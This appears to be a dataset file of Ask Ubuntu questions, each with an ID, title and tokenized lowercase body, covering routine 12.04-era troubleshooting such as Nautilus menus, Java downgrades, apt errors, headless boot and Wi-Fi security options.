143471	menus not working in nautilus	in 12.04 , after fresh start of ubuntu os , the bookmarks in nautilus works fine . but after a while , for some unknown reason , clicking any bookmarked directory does n't take me to the bookmarked directory . after another while , clicking the `` bookmarks '' menu , it does n't even show the drop-down list of bookmarked directories . actually all the other menus file , edit , view , go and help do not respond either . so i wonder what has gone wrong ?
143474	devede 3.21.0 is not producing working titles in 12.04	devede 3.21.0 produces an dvd for playback in dvd players , but the title menu does not show up .
143477	what do `` dashes '' mean in permissions-tab of file/folder properties ?	if i use dconf-editor to change the way permissions display ( how to change permissions appearance in 12.04 ) and then bring up the file/folder properties of something in nautilus ( e.g. , right-click a folder and select properties > permissions ) , sometimes the boxes for permissions under the permissions-tab have dashes in them , like so : what do the dashes mean ? i was expecting a checkmark/no-checkmark to signify enabled/disabled . but dashes ? ______________________edit______________________ they also do not appear to be an instance of `` mixed states . '' for example , here is a screenshot of a folder that has one solitary file in it . note the dashes under file permissions : here is a screenshot of the file persmissions of that solitary file : why is a folder with just one file in it showing the dashes if dashes mean mixed content ?
143480	how to downgrade oracle java 7 to java 6 ?	i recently changed my wubi install into a full install , which runs a lot smoother than wubi . i had to re-install all my stuff , because i did it the lazy-man 's way , and after reinstalling java , i decided to use oracle 's build , as it 's known to be more stable , and there 's not a single java program that breaks under oracle 's . but , now i find that certain programs , namely 3d ones , are having some big glitches , and i know for a fact these glitches are caused by java 7 being not-so-java 6-ish , as the same programs work fine under my windows boot , which has java 6 on it . there is some information that may make it seem like i want to run openjdk , or something , but that is not the case . i just want to know how to downgrade from oracle java 7 , down to oracle java 6 . thank you . edit : to install , i used the following method : sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer
143484	how do i get login statistics ?	i want to get a list that shows how many times each user logged in to the system . something along the lines user1 45 user2 134 user3 200
143487	no save dialog appears when i hit printscreen	when i hit printscreen is taking a capture ( even the sound is present ) , but the save file dialog is not showing . any ideea ? this is already set : screenshot command line=gnome-screenshot window screenshot command line=gnome-screenshot -- window tested links : hitting screenshot key does not give a preview
143488	ubuntu 12.04 - command line : no headless boot	i 'm setting up ubuntu 12.04 minimal on a mini-pc using a gene 5313 motherboard with a geode lx800 cpu . i 'll use it as a headless pc with just transmission , ssh , ddclient and few more stuff . the problem is that i can not boot it without a monitor physically plugged . i did not install x11 , and i will not . i want it only command-line ( and it 's working very good ) so ... i will not use vnc , nor any kind of remote desktop i will access it only by ssh from my local network and maybe some web services i already tried to set the grub_cmdline_linux= '' nomodeset '' variable on /etc/default/grub . it did n't work my bios is already set to `` halt on no error '' i would prefer to not simulate a vga monitor by wiring a resistor on the vga connector , as suggested elsewhere . all i can do is to make sure i have a monitor plugged when i power it on , let it boot and then i can also unplug the monitor , it works fine . but i will install my mini-pc far from my monitor . if i power it on without a monitor plugged , i only get to `` verifying dmi pool data '' , no os boot . i followed a lot of guides to solve this but always failed . any help ? thank you
143492	how do i replace the hud functions from rhythmbox with clementine ?	i 've been searching for this for a while and i ca n't find anything about it .
143494	what is the problem while updating : `` w : failed to fetch ... no hash entry in release file ... ''	this is the output of the command # apt-get update . i can not update any packages with update manager either . what is the problem ? ign http : //mirrors.dotsrc.org precise-getdeb inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease get:1 http : //www.remastersys.com precise inrelease [ 2,069 b ] get:2 http : //mirrors.dotsrc.org precise-getdeb release.gpg [ 836 b ] ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease ign http : //archive.ubuntu.com precise-security inrelease get:3 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //mirrors.dotsrc.org precise-getdeb release hit http : //www.remastersys.com precise/main i386 packages hit http : //ppa.launchpad.net precise release.gpg get:4 http : //archive.ubuntu.com precise release.gpg [ 198 b ] hit http : //mirrors.dotsrc.org precise-getdeb/apps i386 packages get:5 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:6 http : //archive.ubuntu.com precise-backports release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg ign http : //www.remastersys.com precise/main translationindex hit http : //ppa.launchpad.net precise release hit http : //mirrors.dotsrc.org precise-getdeb/games i386 packages get:7 http : //archive.ubuntu.com precise-security release.gpg [ 198 b ] ign http : //mirrors.dotsrc.org precise-getdeb/apps translationindex ign http : //mirrors.dotsrc.org precise-getdeb/games translationindex hit http : //ppa.launchpad.net precise release get:8 http : //archive.ubuntu.com precise release [ 49.6 kb ] hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:9 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //ppa.launchpad.net precise/main i386 packages get:10 http : //archive.ubuntu.com precise-backports release [ 49.6 kb ] get:11 http : //archive.ubuntu.com precise-security release [ 49.6 kb ] ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:12 http : //archive.ubuntu.com precise/main sources [ 934 kb ] ign http : //mirrors.dotsrc.org precise-getdeb/apps translation-en_us get:13 http : //archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:14 http : //archive.ubuntu.com precise/universe sources [ 5,019 kb ] ign http : //www.remastersys.com precise/main translation-en_us ign http : //mirrors.dotsrc.org precise-getdeb/apps translation-en ign http : //mirrors.dotsrc.org precise-getdeb/apps translation-bn ign http : //mirrors.dotsrc.org precise-getdeb/games translation-en_us ign http : //mirrors.dotsrc.org precise-getdeb/games translation-en ign http : //www.remastersys.com precise/main translation-en ign http : //mirrors.dotsrc.org precise-getdeb/games translation-bn ign http : //www.remastersys.com precise/main translation-bn ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-bn ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-bn ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-bn ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-bn get:15 http : //archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:16 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:17 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:18 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:19 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:20 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:21 http : //archive.ubuntu.com precise-updates/main sources [ 46.9 kb ] get:22 http : //archive.ubuntu.com precise-updates/restricted sources [ 1,379 b ] get:23 http : //archive.ubuntu.com precise-updates/universe sources [ 14.4 kb ] get:24 http : //archive.ubuntu.com precise-updates/multiverse sources [ 696 b ] get:25 http : //archive.ubuntu.com precise-updates/main i386 packages [ 120 kb ] get:26 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 2,439 b ] get:27 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 37.1 kb ] get:28 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex get:29 http : //archive.ubuntu.com precise-backports/main sources [ 700 b ] get:30 http : //archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:31 http : //archive.ubuntu.com precise-backports/universe sources [ 4,404 b ] get:32 http : //archive.ubuntu.com precise-backports/multiverse sources [ 14 b ] get:33 http : //archive.ubuntu.com precise-backports/main i386 packages [ 559 b ] get:34 http : //archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:35 http : //archive.ubuntu.com precise-backports/universe i386 packages [ 3,167 b ] get:36 http : //archive.ubuntu.com precise-backports/multiverse i386 packages [ 14 b ] hit http : //archive.ubuntu.com precise-backports/main translationindex hit http : //archive.ubuntu.com precise-backports/multiverse translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex get:37 http : //archive.ubuntu.com precise-backports/universe translationindex [ 72 b ] get:38 http : //archive.ubuntu.com precise-security/main sources [ 12.6 kb ] get:39 http : //archive.ubuntu.com precise-security/restricted sources [ 14 b ] get:40 http : //archive.ubuntu.com precise-security/universe sources [ 4,522 b ] get:41 http : //archive.ubuntu.com precise-security/multiverse sources [ 696 b ] get:42 http : //archive.ubuntu.com precise-security/main i386 packages [ 43.9 kb ] get:43 http : //archive.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:44 http : //archive.ubuntu.com precise-security/universe i386 packages [ 10.3 kb ] get:45 http : //archive.ubuntu.com precise-security/multiverse i386 packages [ 1,393 b ] hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/restricted translation-bn hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en fetched 12.8 mb in 11min 35s ( 18.4 kb/s ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-backports_universe_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead .
143495	web services configured using webmin wo n't work after system reboot	this is for a school project . i need to configure a simple server that provides dns , http , ftp and dhcp . since i do n't like tinkering with the config text files , i decided to use webmin instead . however after successfully configuring these services , after a system reboot they wo n't work , and i already tried using the terminal to restart the services myself . so , i 'm quite lost .
143498	how to divide an image in x equal parts	i am working to create a google group for ubuntu but one thing i want to do is create the main image that goes in the top ( the one that divides into 5 pieces ) . how can i divide an image horizontally ( or vertically ) via terminal or gui . for example i grab a ubuntu quantal image and tell a gui or terminal program to divide the image in 5 equal parts horizontally ( in this case ) .
143500	how can i boot directly to ubuntu after removing windows from a dual boot ?	i just removed windows from my laptop completely . i will install it on virtual box . my question is now , how and from where do i edit the boot options to boot directly in ubuntu after i open my laptop without passing through the boot options page or if this is not possible , how do i remove the windows boot line from there ?
143510	single row of workspaces with unity 2d	using 12.04 with unity 2d i have the opposite problem to this question - how can i change from a 2x2 arrangement to having a single row of workspaces ?
143511	is there a list of phones that will work with ubuntu for android	ubuntu for android sounds intriguing and i am interested in checking it out but was wondering if anyone knows which phone/models have the necessary specs and available docks to work with it . ** edit ** after further searching it looks like ubuntu for android will primarily be pre-installed so it probably wo n't be the case of spec'ing out a phone and installing it like i originally thought .
143513	unallocated space , how to resize /home partition ?	i removed my windows os and now i want to resize my /home partition with that unallocated space . the main problem is that the free space is not under my sda4 . how to move it there and then resize my /home partition ? here is my current partition layout :
143517	can i connect a media player to ubuntu	i want to switch 100 % to ubuntu from windows . of course i must have my netflix account which i know wo n't work with linux natively . my question is , can i connect a roku box or another media player box to ubuntu so that i can watch netflix through linux ?
143518	does ubuntu rely on windows if i install it using the windows installer ?	if i install ubuntu to a new partition using the windows installer ( wubi ) , will i be able to uninstall windows , and have ubuntu boot by itself ? or does it rely on windows ? if i uninstall windows will ubuntu be useless ? but the reason i ca n't install ubuntu using the cd is because of this problem : when i try to install the 64bit version of 12.04 through a cd , it just skips to the windows boot screen . this user has the same problem as i just listed : unable to install the 64-bit version of ubuntu on both a dell xps 15z or a dell xps 8300 . also i 've followed the instructions here , but nothing has helped . i would like to use the 64bit installation , but sadly i cant .
143519	why does it take so long to start gvim ?	when i start gvim : $ date ; /usr/bin/gvim ; date tue may 29 10:45:45 cst 2012 ** ( gvim:6030 ) : warning ** : unable to create ubuntu menu proxy : timeout was reached tue may 29 10:46:11 cst 2012 to stop ubuntu menu proxy : export ubuntu_menuproxy=0 and test it again : $ date ; /usr/bin/gvim ; date tue may 29 10:46:47 cst 2012 tue may 29 10:47:13 cst 2012 no warning . but it still takes 26 seconds to start gvim . why it 's so slow ? is there any season to make it happen ( both 26 sec ) ? currently , i use : alias gvim='gvim -f' but i can not detach from shell anymore . hope ubuntu developer fix this problem as soon as possible . $ dpkg -- list | grep vim ii vim-common 2:7.3.429-2ubuntu2.1 vi improved - common files ii vim-gnome 2:7.3.429-2ubuntu2.1 vi improved - enhanced vi editor - with gnome2 gui ii vim-gui-common 2:7.3.429-2ubuntu2.1 vi improved - common gui files ii vim-runtime 2:7.3.429-2ubuntu2.1 vi improved - runtime files ii vim-tiny 2:7.3.429-2ubuntu2.1 vi improved - enhanced vi editor - compact version
143523	networkmanager : `` wireless security '' only shows `` none '' , no way to connect to wpa2	here is how the `` connect to hidden wireless network '' dialog used to look with ubuntu 2011.04 : the `` wireless security '' list showed different protocols , including the one i want ( wpa & wpa2 personal ) problem : with ubuntu 2012.04 ( on another laptop ) , only `` none '' is shown in `` wireless security '' : question : why are the other options no longer available in 2012.04 ? i have just installed it , it is in an out-of-the-box state .
143525	12.04 64bit will not install through a live cd	when i try to install the 64bit version of 12.04 through a live cd , all that happens is that the disk spins , and i get the windows boot screen . i 've set my bios to boot from a cd first , before booting from the hard drive , so the cd should work , but it just skips to windows . ive tried everything here , and nothing from it helped . could something in my bios be interfering with the installation ? i am using a dell xps 14z i would prefer not to use the 32bit version of ubuntu because i want it to be at its full potential . i 've tried downloading and burning to cd 's multiple times to ensure that it 's not corrupted . would you suggest one of these ? try to install an older version , like 11.10 64bit , and upgrading it ? installing with a usb or external drive ? it 's alright now , i used an external hard drive to install ubuntu and i also have 64 bit . thanks for the input !
143526	12.04 wo n't recognize my cd/dvd drive	cd/dvd drive is an ide slave device , and my hard drive is the ide master device . the hard drive is located at /dev/sda1 , but dev/sda2 ca n't be mounted . ( i ca n't use -t auto and i do n't know what the file system in use is . i 've tried using said disc drive with filled and empty discs , but i ca n't mount /dev/sda2/ . at all . if anyone could help , that would be appreciated .
143528	12.04 unable to communicate with router wrt310n	i have a sony vaio vpccb22fx running 12.04 and i 'm trying to connect to my home router which is a linksys wrt310n . the connection is supposed to be ok . i connect to the router and i actually received an ip address correctly but i ca n't get into the internet . i ca n't even ping my default gateway ( linksys router ) . what could be the problem ? the router has connectivity to the internet because i can use another computer and connect to that same router without problems . i ca n't ping my laptop from the router either . please , any ideas ? i 'm a ubuntu newbie . appreciate all the help .
143532	bash ignores what i type while `` apt-get '' is running	i am encountering this problem : i type sudo apt-get install < package > , and hit enter . apt-get starts resolving dependencies and downloading/installing packages . while it is running , i want to enter another command in the same terminal , so i type it ( let 's say echo done ) . the problem is , i type echo done and enter , but when apt-get finishes , the echo done is not executed . the shell comes back to me with a prompt , and there is nothing in its input buffer . so , bash seems to ignore my input while apt-get is running . this `` ignoring '' does n't seem to happen with any other command . i would like to figure out why this is happening , and if i can change the behaviour somehow .
143537	how can i boot into windows after installing ubuntu ?	i just installed ubuntu 12.04 and i love it but i have some files on windows i also need to get to and i ca n't seem to get onto windows . i tried restarting but no option came up to boot up into windows . any help would be appreciated cause i need these files !
143542	apple wireless mouse and keyboard does not work	i paired the mouse and keyboard on ubuntu , but it seems not work . i got this error in /var/log/syslog : kernel : [ 1875.935712 ] input : apple magic mouse as /devices/pci0000:00/0000:00:12.0/usb4/4-3/4-3:1.0/bluetooth/hci0/hci0:2/input34 kernel : [ 1875.935885 ] evdev : no more free evdev devices kernel : [ 1875.935893 ] input : failed to attach handler evdev to device input34 , error : -23 kernel : [ 1875.936049 ] magicmouse 0005:05ac:030d.0003 : input , hidraw0 : bluetooth hid v3.06 mouse [ apple magic mouse ] on 00:19:5d:0f:4a : f6 kernel : [ 2334.787710 ] input : apple wireless keyboard as /devices/pci0000:00/0000:00:12.0/usb4/4-3/4-3:1.0/bluetooth/hci0/hci0:4/input36 kernel : [ 2334.787729 ] evdev : no more free evdev devices kernel : [ 2334.787737 ] input : failed to attach handler evdev to device input36 , error : -23 kernel : [ 2334.787999 ] generic-bluetooth 0005:05ac:0255.0005 : input , hidraw1 : bluetooth hid v0.50 keyboard [ apple wireless keyboard ] on 00:19:5d:0f:4a : f6 nothing appears in xinput -- list , only the wired mouse and keyboard . how to fix that ?
143543	slow printing to hp laserjet 6mp with 12.04	what can i do to print faster ? my laserjet 6mp has the max amount of memory . connected directly to ubuntu pc , via lpt . it was printing faster with windows 2000 .
143551	huawei e682 modem not working in 12.04	i 'm a user of ubuntu in kenya , i 've a huawei e682 modem . when i use it in ubuntu 11.04 it connects without any problems to the internet . but in ubuntu 12.04 i can hardly connect to the internet using it . does anyone have an idea what the problem is ? any help will be appreciated .
143553	how can i disable `` pointer can be controlled using the keypad '' function on laptop ?	i 'm using ubuntu 11.10 on desktop but ubuntu originally was installed on laptop . numeric keypad on my keyboard was set as mouse moving and mouse button . no matter how i toggle num lock and change the qwerty to azerty and change back , i ca n't use numeric keypad probably .
143554	'sudo ' not working after changing the permissions of '/usr ' directory	recently i had to change the folder permissions of /usr folder . now the whole sudo is not working . if i try to update my system using this command : sudo apt-get update i get the following message : sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins so i tried to change the folder permissions by opening nautilus as root by using this command gksudo nautilus but nothing happened . nautilus did n't open . this is an emergency as the whole of sudo is not working . when i tried searching the solution from google many suggested re-installation . i do n't prefer re-installation . so is there any other solution ?
143561	why wo n't strace/gdb attach to a process even though i 'm root ?	i logged in as root but strace gives me this : root @ kyznecov-system : /home/kyznecov # ps -e | grep 111 3807 pts/2 00:00:00 111 3810 pts/2 00:00:00 111 root @ kyznecov-system : /home/kyznecov # strace -p 3810 attach : ptrace ( ptrace_attach , ... ) : operation not permitted could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf root @ kyznecov-system : /home/kyznecov root @ kyznecov-system : /home/kyznecov # cat /proc/sys/kernel/yama/ptrace_scope 0 i then tried to use gdb to debug a multiprocess program in eclipse cdt with forking , and it gave me the same result/error : any ideas ?
143566	password required but dialog wo n't let me type it	on ubuntu 2012.04 i open `` connect to hidden wireless network '' , type the network name , click connect . after a minute the dialog below appears : i can only cancel ... not very helpful . why does the dialog not just offer me to type the password ? on ubuntu 2011.04 i am asked for a password and it just works ... the network is wpa2 personal , but this other issue means i have to select `` none '' for security .
143567	no kernel found at system startup	i 'd installed ubuntu10.10 in windows7 . it was working well but now a days when i choose ubuntu at the start-up of the system it does not found any kernel . is there any way how to fix that ?
143573	is there any way to use qwerty 's keyboard shortcut position while the dvorak layout is active ?	i am a dvorak layout user and i am happy with the switch . i avoided the undo/cut/copy/paste shortut disadvantage ( the z , c , x and v are far apart on dvorak layout ) on windows by using microsoft 's keyboard layout creator to map control key combinations back to their qwerty counterparts , but it 's bugging me that i ca n't do the same on ubuntu/linux , even though it has a more advanced input framework . dvorak-querty is supposed to accomplish this but does n't work for me . the comments on the bugs referred to by a previous similar question does n't provide any viable workaround for this . so is there anything i can do aside waiting ( for years ) for the bugs to be fixed , like writing a custom keyboard layout or ibus plugin ? clarification ( another way of putting my question ) is there any way to use qwerty 's keyboard shortcut position while the dvorak layout is active ? for example , to 'copy ' , i have to press ctrl+i ( the position of the 'i ' on qwerty is 'c ' on dvorak , which is a awkward stretch ) , then for 'paste ' , i have to press ctrl+ . ( another awkward position ) . i want to press ctrl+c and ctrl+v currently i 'm using the old-style shortcuts i learned from the dos-era , shift-del for cut and ctrl+insert for copy ...
143578	is seagate 's new `` fast factor boot '' technology compatible with ubuntu ?	i 'm looking at buying a new laptop and considering buying one with a hybrid hdd/ssd drive . specifically i am looking at the new second generation seagate momentus xt . for some reviews look here and here . the caching is all done on the firmware level so there is no question that this basic functionality will work with ubuntu . however , the second generation drives are supposed to now reserve space on the ssd for os boot files . the seagate documentation describes it this way : boot momentus xt drives are known for incredibly fast boot-up times , and now they are even better with fast factor boot technology . this system boot-up technique can reduce your boot time to mere secondsâfor a fast cold-boot start . it can cut your system start-up time by up to 65 % over a traditional hdd . fast factor boot technology will deliver the fastest boot possible , whether you boot your system once a day or once a week . your os boot-up files are always there , ready to work . ( source ) what concerns me is there is no additional information about this in the product manual and the reviews seem to suggest that the firmware might be looking for windows boot files specifically . see for example : dubbed fast factor boot , this new approach aims to accelerate the windows boot process whether you 're firing up the os for the first time or rebooting after months of uninterrupted activity . with the old momentus xt , adaptive memory needed a few boots to learn which os-related data to cache . using the drive for long enough without rebooting had the potential to push that data out of the cache , reversing any previous boot-time benefits . with the new xt , a segment of the nand has been reserved solely for os data related to the boot process . that section of the flash is populated as windows is installed to the drive , which should speed things up starting from the first boot . if windows is being installed via a drive image , the xt will need a couple of boots to determine what to put in the roped-off section of its cache . as with clean installs , that data wo n't be kicked out of the cache between boots . ( source ) the seagate documentation mentions nothing about being specific to windows os boot files , so i 'm wondering if the review is just being ignorant of there being oses other than window or if they are actually privy to some information that is not in the official documentation . anyone have any ideas about this ? seagate 's response ( i 'm adding this into the question as i do n't consider it a satisfactory answer -- just more background for the question ) i sent seagate a message through the presale 's email support form on their website asking about this . i talked with two support agents , one via email and one via live chat . the first agent was professional but not particularly helpful , responding with this email : hello austin , thanks for contacting seagate global support . we do not test our drives for use with linux . sorry we can not answer your question in depth . regards , agent ( taking names out ) seagate global customer support i responded saying that i did n't need an answer based on performance proven through testing but rather just the expected behavior . another agent responded to my email but there was a mix-up and he actually sent me a link for a screen-sharing , which out of curiosity i boot up a windows vm and followed . the agent realized there was a mix up but was still willing to discuss my question in the screen-sharing softwares chat function . this second agent was more helpful , but i got the feeling that he was n't very knowledgeable about the product . he said that linux is not a supported os but that it should be compatible with linux . when i asked for information specifically about the reserved space on the ssd for os files , i just got another description of the basic features of the momentus xt line , `` it caches frequently accessed files regardless of os or software . '' he had no information about the new `` fast factor boot '' feature -- and honestly , i was n't even sure if he knew about the new feature at all . i asked him if he could email me a summary of our conversation to post on a website and he sent this : dear austin , thank you for contacting seagate . officially linux is not supported , because it is an open source operating system . by selectively tackling data that is frequently used and time-consuming to fetch , the momentus xt drive will copy this data into the flash and maintain the relevancy . you get the instant response experience you 've been searching for . momentus xt hybrid drives are designed to work in any standard laptop . these drives are os- , driver- and software-independent , making them remarkably simple to integrate and easy to use . if you have any additional questions you may call us during your regional business hours listed below . for your convenience we also have on-line chat assistance . live assistance : chat : americas : http : //support2.seagate.com/chatlaunch ? rc=1 europe : http : //support2.seagate.com/chatlaunch ? rc=2 regards , ( name removed ) seagate global customer support so in summary : confirmation of what we already knew ( basic functionality is os independent ) no information at all about the new reserved space for boot files a very weird statement ( officially linux is not supported , because it is an open source operating system . ) about open source software that i assume/hope is not really seagate 's reason for not supporting linux . i think to get a real answer we would need to talk with either a ) someone who owns this drive and could test the boot performance , or b ) somehow get through to a high-level support agent who is actually familiar with the product 's features . i 'm considering contacting system 76 , who have this drive as an option for their ubuntu laptops and asking them if they 've tested the boot performance ( or if their oem status can get more useful answers out of seagate ) . if people have twitter accounts ( i do n't ) they could also start tweeting this question at seagate ( @ askseagate ) and see if it catches their attention .
143579	how can i change the language in the profilemanager ?	my standard language for firefox and thunderbird is dutch . when i use the terminal to open firefox or thunderbird with the -profilemanager option , the resulting profilemanager is in english . how can i change the language to dutch in the profilemanager ?
143582	how to stop bzr from using ssh ( asking a password ) for downloading ?	i have configured bzr to push updates and now it 's using ssh for downloading all the branches too . is it possible to use ssh only for uploading ?
143583	change spacing of icons in indicator applet complete , preferably by editing a config file ?	changing icon spacing within application indicator complete . if at all possible , i 'd like to space them with about 1-3px between each one . https : //launchpad.net/indicator-applet [ website ] i 'm using 12.04 , and in gnome classic ( no effects ) . i 'm working from a netbook ( 1024x600 ) , and am trying to fit everything into one panel for the sake of screen conservation . ironically , my netbook is often without reliable net access , and so a way to simply edit a config file or the like would be ideal , as opposed to downloading patches , modified packages , etc. , but anything would be helpful . even pointing me in the direction of how to start rebuilding the indicator to meet my needs ( if need-be ) would be welcome . does anyone know of a method that would serve my purpose ? edit : i 've downloaded v0.4.93 from the site mentioned above , and took a look inside the archive . could n't find anything clearly alluding to object placement/size and such . maybe just a pointer on where to find those params would do ? edit 2 : some more info on my wm/de : i 'm pretty sure gnome classic is gtk2 not gtk3 , and equally sure my windows manager is metacity , as opposed to compiz . `` equally sure '' meaning i could be horribly wrong , but when i edit the metacity css file for my theme ( which ive switched to `` adawaita '' ) , it takes effect after logout/login . my inability to modify the spacing persists . im gon na see if i can contact someone involved in its dev to get their input , will post results here if fruitful .
143585	how do i get rid of nvidia xserver ?	how can i get rid of nvidia xserver ? i have tried : sudo apt-get remove nvidia-xserver
143589	how do i enable the `` scale window title filter '' in compiz on 12.04 ?	i 'd like to use the compiz `` scale window title filter '' on 12.04 . i 've already read another answer which just said to install compiz-plugins-extra and enable `` scale window title filter '' in the ccsm . i 've done this , but when entering scale mode ( < super > +w or < shift > + < alt > + < up > ) nothing happens when i type . i have tried restarting unity , logging out and even rebooting , but this behaviour remains the same . am i missing something ? how do i enable it ? has anyone got it working correctly on 12.04 ?
143593	promoting an app in the ubuntu software center through a ratings and reviews api	as an app author , i would like to promote my app in ubuntu . one nice way to do it is to encourage users to submit their reviews and ratings to the software center . it would be really cool if i could just add a 'submit review ' button in the about dialog of my app to make it extremely easy to write and submit a review . is there a software center ratings and reviews api that i can access through python to achieve that ?
143598	open file in folder does n't work as it should	when i download a file , and i click on the little arrow beside it ( or right click on it ) and i tell it to `` open file in folder '' , it opens the folder but does n't highlight the file the way mac os x or windows do . do you know if there is an option sojmewhere , or a software , that can do this ? or should i report a bug ?
143615	ubuntu one hangs router sockets	i have ubuntu one for kde in 12.04 kubuntu . every time i run it from scratch , e-mail and others stop working properly giving socks problems . that problems appear in all computers on the network and stop when i restart the router . the problem only happens when u1 is syncronizing lots of files at the same time , so i supose i have a problem with a threshold of ports/sockets in my router . is there any way to limit them in ubuntu one configuration ? could you put a maximum in the parameters section the same way you have an upload/download limit ? thank you .
143617	microsoft office programs ( wine ) ca n't save to cifs mount	i have mounted a folder from my nas ( ubuntu server 10.4 , samba ) on my workstation ( ubuntu 11.4 cifs ) and everything works fine , except ms office 2010 ca n't save to that folder . i see word creates a temporary file and then it asks me for a new file name . excel and powerpoint do the same . there are not strange characters in the filename .
143618	picasa hangs when trying to import photos	after i installed picasa 3.9 , i tried to import some photos from a usb stick plugged in . however , it does not show up in picasa ( ubuntu has no problem recognizing it ) . there is just a general mass storage camera item in the import from field . when i select it , the program hangs . could it be caused by this bug ? do you know any workaround ?
143624	how can i prevent two shell scripts running at the same time ?	i have a tar backup script that runs once a month . it runs at night through cron . i also have a power schedule that reboots the server at 4.15 every night . the problem is that the server reboots while the tar script is running . can i add something to the beginning and end of a bash script to disable a reboot while the script is active ?
143629	desktop does n't load after messing with gtk	so i guess i majorly screwed up . in order to install gimp 2.8 i had to upgrade gtk . i first installed 3.4 but it would n't work , so i then installed a specific version of 2.4 . now , after rebooting , my desktop theme had changed and was really ugly , so i decided i 'd revert all changes i had made ( and gimp 2.8 was n't really that more useful than 2.6 ) . i went back to my packages and did sudo make uninstall on all of them . after another reboot , no more desktop , not even a login prompt , all i see is the console which usually briefly appears before the login prompt , with things like `` bluetooth started '' . i ca n't seem to be able to interact with it . the only time i can make it change is when i press the power button and it shuts down all services before powering off . i 'm now logged in from the install cd , and i 'd be really happy to find a fix instead of having to reinstall everything from scratch.. anybody knows how to ? thanks in advance !
143631	wrong screenorientation	i have a problem with my second screen . i want to use my tv to watch videos on it . so i took a dvi-i to hdmi cable , sticked the dvi end into my computer and the hdmi end to my tv . the screen shown up , but was in the wrong orientation . the sidebar was on the ground and the whole screen was turned . ubuntu thinks that the tv is higher than it is wide . have anyone the answer on this ? thanks , sydoxx
143635	music does n't work in openttd	i am big fan of openttd game . in windows i just have to grab a online installer and the game runs fine smoothly . i downloaded the game .deb file from the openttd download site . i installed opengfx and opensfx . but i can not hear music . all seems to run fine . how to bring back the music ? by the i am using ubuntu 11.10 32 bit .
